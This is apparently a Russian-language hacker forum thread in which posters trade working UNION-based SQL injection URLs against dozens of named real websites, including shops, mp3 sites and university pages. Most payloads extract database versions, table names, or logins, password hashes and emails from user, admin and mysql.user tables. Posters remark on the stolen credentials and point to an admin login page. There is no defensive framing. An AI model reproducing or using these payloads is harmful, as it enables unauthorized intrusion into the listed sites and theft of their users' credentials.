SQL Инъекции

Code:

http://www.mp3.nvcom.ru/show_mp3.php?albumid=-1+union+select+1,2,3,4,concat(login,0x3a,password,0x3a,email),6,7+from+users_download+limit+0,1/*

база юзеров платного mp3-сайта..(login:рass:email)
правда по одному выводится)

 

Code:

http://www.avto.kg/parts.php?p=9&id=-1+union+select+1,concat(username,char(58),user_password)+from+phpbb_users+limit+1,1/*

Code:

http://www.zapchasti.chebtz.ru/spisokname.php?id_tov=-1+union+select+1,2,3,4/*

Code:

http://astra-comp.ru/order.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2/*

Code:

http://www.soundgroup.ru/comment.php?idold=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14/*

 

Code:

http://biomedical.rutgers.edu/faculty.php?id=-1+union+select+version(),null,3,4,5,6,7,8,9,10,11,null,13,14,15,16,17,18,19,20/*

Code:

http://www.omnigraphics.com/category_view.php?ID=-1+union+select+1,version(),3,4,5/*

Code:

http://www.arbeitundalter.at/rf_detail.php?id=-1+union+select+1,2,3,4,5/*

Code:

http://iwf.ru/main/top.php?id=-1+union+select+1,2,version(),4/*

Code:

http://holiday.ayda.ru/advices.php?id=-1+union+select+1,2,3,version(),5/*

Code:

http://www.datacd.ru/faq.php?id=-1+union+select+1,user(),version()/*

Code:

http://www.centresh.ru/article.php?id=-1+union+select+1,2,3,4,5,6,7/*

Code:

http://www.aoelmon.ru/next.php?id=-1+union+select+convert(user()+using+cp1251)/*

Code:

http://www.zhg.ru/town/gallery/fotos.php?id=-1+union+select+1,2,user(),4/*

Code:

http://www.rcmgroup.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Code:

http://www.worstpreviews.com/review.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,user(),31,32,33,34,35,36,37,38,39,40/*

Code:

http://www.festival-mironov.ru/news_once.php?id=-1+union+select+1,version(),3,4,5,6,user()/*

 

MTV.COM

 

PHP:

http://www.pharmabort.ru/page.php?id=-1+union+select+1,2,3,user(),password,6,7,8,9,10,11,12,13,14,15+from+pharma_admins/*

 

Code:

http://dusanko.net/komentare.php?art=-1+union+select+1,version(),3,4,5,6,7,8,9/*

Code:

http://www.auditorium.ru/aud/gost/gost.php?gid=-1+union+select+1,2,3,user(),database(),6,version(),8,9,10,11,12,13,14,15,16,17,current_date(),19,20,21,22/*

Code:

http://www.mptri.ru/eng/index.php?art=-1+union+select+1,version(),3,4,5/*

Code:

http://www.nevanews.com/index.php?art=-1+union+select+1,2,user()/*

- есть таблица users

 

..

 

Code:

http://www.ewm1.pl/newru/baza/formemail.php?id=-1+union+select+1,concat(login,char(58),pass),3+from+user/*

Code:

http://www.rolemancer.ru/printfeature.php?artid=-1+union+select+1,2,3,4,5,6,7,8/*

 

PHP:

http://www.sti.ru/acter.php?id=-1+union+select+user(),version()/*

PHP:

http://highpointlowlife.com/webrelease.php?id=-1+union+select+1,2,version(),user(),5,6,7,8/*

PHP:

http://www.plantgeek.net/article_viewer.php?id=-1+union+select+1,2,version(),user(),5,6,7,8,9,10,11,12/*

PHP:

http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,convert(version()+using+latin1)/*

http://www.cageprisoners.com/page.php?id=-1+union+select+1,user(),password+from+admins/* - логин и пароль(хз как зашифрован).

http://www.cageprisoners.com/admin -вход в админку.

 

2Grey
я его давно уже ковырял

Code:

http://www.rolemancer.ru/sections.php?op=listarticles&secid=-69+union+select+1,2,concat(uname,char(58),pass),4+from+users/*

воть

 

Последние на сегодня:

Code:

http://physics.com.ua/news_interest.php?id=-1+union+select+1,user(),3,4,null,null,7,8,version()/*

Code:

http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,version(),user()/*

Code:

http://www.barspb.ru/galleries.php?id=-1+union+select+user(),2/*

 

Code:

http://www.xmlhack.com/read.php?item=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES/*

 

Code:

http://www.linspire.com/linspire_letter_archives.php?id=-40+UNION+SELECT+1,version(),3,4/*

 

http://m-l.com.ua/issues.php?aid=-689+union+select+1,2,3,4,5,6,7,8,9/*

http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,VERSION(),5/*

http://zvisti.com.ua/info.php?id=-3461+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES/*

http://www.science.oas.org/INFOCYT/info.php?id=-2526+union+select+1,2,3,4,password,6+from+mysql.user/*

http://www.slavneft.ru/press/info.php?id=-420+union+select+1,2,mail,id,5,6,7,8,9+from+mail/*

http://www.worstpreviews.com/review.php?id=-393+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*

http://www.dvdfuture.com/review.php?id=-805+union+select+1,2,concat(user_email,char(58),user_icq,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users+limit+1,1/*

http://planeta.sch2.net/ship/review.php?id=-16+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.derives.net/reviews/review.php?id=-1535+union+select+1,2,3,4,5,6,7,8,9/*

http://www.guitarnoise.com/review.php?id=-375+union+select+1,2,3,4,5,6,7,8/*

http://www.storing-zine.net/review.php?id=-242+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

SWAT, www.partytown.ru // http://www.tsb.kz я уже выкладывал.

 

за всем проследить не могу....подправил месагу))

 

SWAT, да всё нормально) у всех бывает

Code:

http://www.williams.edu/admin/news/releases.php?id=-1106+UNION+SELECT+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+editors+limit+1,1/*

Code:

http://www.williams.edu/admin/news/releases.php?id=-1106+UNION+SELECT+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+editors/*

странно с лимитами получилось, без лимита одно, с лимитом 1,1 другое, лимиты до 50 перебрал - пусто ну вообщем вот.

Code:

http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12+from+information_schema.columns/*

Code:

http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables/*

посмотрел все таблицы\колонки - ничё дельного.

 

_http://uptime.ru/content.php?what=preleases&id=-1+UNION+SELECT+1,0x4C4F47494E3A4D7953514C5F686173682870617373776F7264293A655F6D61696C,concat(login,char(58),password,char(58),email),4,5,6,7+from+users+limit+8541,1/*

 

какой-то интернет-магазин...

Code:

http://www.nordiz.ru/tovar.php?tovar_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat(user,0x3a,password),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+mysql.user+limit+1,1/*

логин и mysql-хеш админа.

ps: 57 столбцов, ужс

//upd:

Code:

http://www.oxid.ru/mp3/mp3.php?id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+1,1/*

очередной mp3шник, на этот раз - бесплатный
формат данных login:рass:email

&&upd2:

Code:

http://www.eventor.ru/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

название не подобрал =\

 

Наевеяно n1†R0x

Code:

_http://www.globalmoney.ru/affiliate/order.php?tovar_id=-1+union+select+1,concat(login,0x3A,password,0x3A,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*

Code:

http://www.qteki.ru/tovar.php?tovar_id=-1+union+select+1,concat(user,0x3A,password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+mysql.user+limit+1,1/*

109 столбцов))

прикольный такой параметр

Code:

http://pda.nordiz.ru/tovar.php?tovar_id=-1+union+select+1,2,3,concat(user,0x3A,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+mysql.user+limit+1,1/*